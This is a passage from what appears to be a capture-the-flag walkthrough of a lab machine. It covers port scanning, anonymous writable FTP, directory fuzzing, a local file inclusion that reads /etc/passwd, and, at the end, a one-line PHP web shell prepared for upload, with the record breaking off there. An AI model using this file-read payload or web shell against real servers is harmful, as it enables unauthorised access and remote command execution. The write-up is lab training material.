PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.125
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
The FTP enables Anonymous login however there is nothing inside except a writable pub folder
┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.125.14 -p 21
Connected to 192.168.125.14.
220 (vsFTPd 3.0.3)
Name (192.168.125.14:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls -la
229 Entering Extended Passive Mode (|||62841|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub
Even fuzzing got nothing interesting
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.14 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> <http://192.168.125.14/javascript/>]
/manual (Status: 301) [Size: 317] [--> <http://192.168.125.14/manual/>]
/robots.txt (Status: 200) [Size: 59]
/server-status (Status: 403) [Size: 279]
/robots.txt is just a troll
However, we can use user-agent to change us to a search engine to view the content:
https://add0n.com/useragent-switcher.html?version=0.4.8&type=install
Simply change it to Google and then Apply and refresh the webpage and we will get to this /secret_information/ directory, and here it introduce us this DNS Zone Transfer Attack
Even though I thought that but it has LFI in it anyway
<http://192.168.125.14/secret_information/?lang=/etc/passwd>
As far as we know there is a tom user in this machine
As far as we know know that: We have writable access to FTP and we have LFI
┌──(kali㉿VirtualBox)-[~]
└─$ cat upload.php
<?php system($_GET['cmd']);?>